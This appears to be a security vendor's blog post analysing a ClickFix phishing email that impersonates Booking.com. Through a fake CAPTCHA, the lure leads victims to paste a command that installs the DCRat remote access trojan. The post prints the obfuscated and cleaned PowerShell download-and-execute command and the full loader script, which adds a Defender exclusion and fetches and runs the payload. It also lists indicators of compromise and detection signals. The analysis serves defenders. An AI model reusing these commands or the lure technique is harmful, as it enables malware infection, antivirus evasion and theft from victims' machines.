Detecting an email-based ClickFix attack that delivers DCRat malware payload

Sublime’s Attack Spotlight series is designed to keep you informed of the email threat landscape by showing you real, in-the-wild attack samples, describing adversary tactics and techniques, and explaining how they’re detected. These attacks can be prevented with a free Sublime account.

EMAIL PROVIDER: Google Workspace

ATTACK TYPE: Malware

We recently saw an attack that used a nifty little JavaScript trick to try to deliver a DCRat malware payload with some help from the user. The attack started with a fake email thread about a potential upcoming apartment rental. The attacker indicates that a colleague of theirs started to book a rental apartment, but then got ill, so they handed the job off (to the attacker).

The attacker indicates that while looking for an accommodation policy, Booking[.]com mentioned an accommodation surcharge. They wanted to confirm that this surcharge information information was indeed accurate, so their message includes a link to Booking[.]com’s “Accommodation Rules” page for the target to review. This is a malicious link.

The malicious link (which has since been flagged by Cloudflare) takes the target to a Cloudflare Turnstile CAPTCHA.

After the real CAPTCHA comes a fake CAPTCHA. The favicon and tab title reflect Booking[.]com, but the CAPTCHA is a JavaScript-powered payload delivery system. When a user clicks the checkbox to confirm their non-robot status…

…the following code snippet is automatically copied to their clipboard:

powERsheLl /nOPR"o" ―W h -c "$url = 'getsyv[.]com';$s"cr"i"pt" = I"nv"oke-"RestM"et"hod" -"Ur"i $url;I"n"vok"e-"Ex"p"re"ss"ion $scr"ip"t"

This script has simple obfuscation. With the formatting cleaned up, it looks like:

powershell /noprofile -windowstyle hidden -command "
$url = 'getsyv[.]com';
$script = Invoke-RestMethod -Uri $url;
Invoke-Expression $script
"

At this point, the CAPTCHA window changes to include two “Verification Steps” for the target:

1. Press Windows+R
2. Press CTRL+V and press ENTER

If the target follows those steps, they’ll paste the command into a Run window.

If they click OK, they’re taken to a Windows PowerShell UAC window.

This PowerShell will then run in the background kicking off the script.

Loader script

Once run, the script reaches out to a server with the following HTTP request:

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.4046
Host: getsyv[.]com
Connection: Keep-Alive

The response from the server is:

HTTP/1.1 200 OK
date: Mon, 19 May 2025 19:01:07 GMT
server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
vary: User-Agent
last-modified: Thu, 15 May 2025 18:14:23 GMT
etag: "2de-63530a2a52e3f"
accept-ranges: bytes
content-length: 734

function VoidHelp {
	while ($true) {
		
    $command = "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
	
    $proc = Start-Process powershell.exe `
        -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `$ErrorActionPreference='Stop'; $command" `
        -Verb RunAs `
        -PassThru
		
    $proc.WaitForExit()
	
    if ($proc.ExitCode -eq 0) {
        Start-Sleep -Seconds 5
		RecHelp
        break
    } else {
    }
}
}

function RecHelp {
$iks = @{
"ny8DsFfwg1" = "FLiAHJErkN"
}
$url = "http://gettsveriff[.]com/bgj3/ckjg.exe"
$destination = "C:\Windows\Temp\tybd7.exe"
Invoke-WebRequest -Uri $url -Headers $iks -OutFile $destination
Start-Process -FilePath $destination
}

VoidHelp

The script is a simple PowerShell script designed to download and execute a malicious file.

DCRat malware

The downloaded file (ckjg.exe - 08037de4a729634fa818ddf03ddd27c28c89f42158af5ede71cf0ae2d78fa198) is DCRat (DarkCrystal), a commonly observed malicious .Net-based remote access trojan (RAT) that has been observed since 2019. DCRat supports functions commonly observed by RATs such as executing shell commands, keylogging, exfiltration of files, browser cookies, saved passwords, and clipboard contents.

It has been widely used by both cybercrime and nation state actors. As DCRat has been documented many times we will skip the in-depth analysis. Using the configuration included within the executable, the following indicators of compromise (IOCs) were observed.

IOCs

DCRat malware (sha256 of ckjg.exe)

• 08037de4a729634fa818ddf03ddd27c28c89f42158af5ede71cf0ae2d78fa198

Filename of DCRat when saved to disk

• C:\Windows\Temp\tybd7.exe

DCRat C2 servers

• hkfasfsafg[.]click
• hfjwfheiwf[.]click
• jfhaowhfjk[.]click
• hfjaohf9q3[.]click
• fshjaifhajfa[.]click

Server within ClickFix PowerShell command

• getsyv[.]com

Server hosting DCRat payload

• gettsveriff[.]com

Emerging Threats Network IDS Signature

• 2062498 - ET MALWARE Observed Malicious SSL Cert (VenomRAT/DcRAT)

Detection signals

Sublime's AI-powered detection engine prevented this attack. Some of the top signals for this attack were:

• New link domain (<=10d) from untrusted sender: The link within the message contained a newly registered domain name (extrannet-ruless[.]com).
• Social engineering: The email creates a scenario involving a sick colleague to appeal to recipient's helpfulness and urgency.
• Brand impersonation: The message references Booking[.]com but links to an unrelated domain (extrannet-ruless[.]com).
• Fake thread: The email thread has been fabricated to include a legitimate-looking message sent from the target company.
• Lookalike domain: The message contains a link to extrannet-ruless[.]com, which is similar to an admin portal on Booking[.]com named the Extranet.

ASA, Sublime’s Autonomous Security Analyst, flagged this email as malicious. Here is ASA’s analysis summary:

Stay secure against email-based ClickFix attacks

Attackers are always testing new ways to deliver payloads. That’s why the most effective email security platforms are adaptive, using AI and machine learning to shine a spotlight on seemingly minor discrepancies.

If you enjoyed this Attack Spotlight, be sure to check our blog every week for new blogs, subscribe to our RSS feed, or sign up for our monthly newsletter. Our newsletter covers the latest blogs, detections, product updates, and more.

Read more Attack Spotlights:

• ScreenConnect as malware via Canva abuse and DocuSign impersonation
• Figma abuse from compromised vendor used in credential theft attack
• $500K financial fraud built on BEC, a domain lookalike, and a fake thread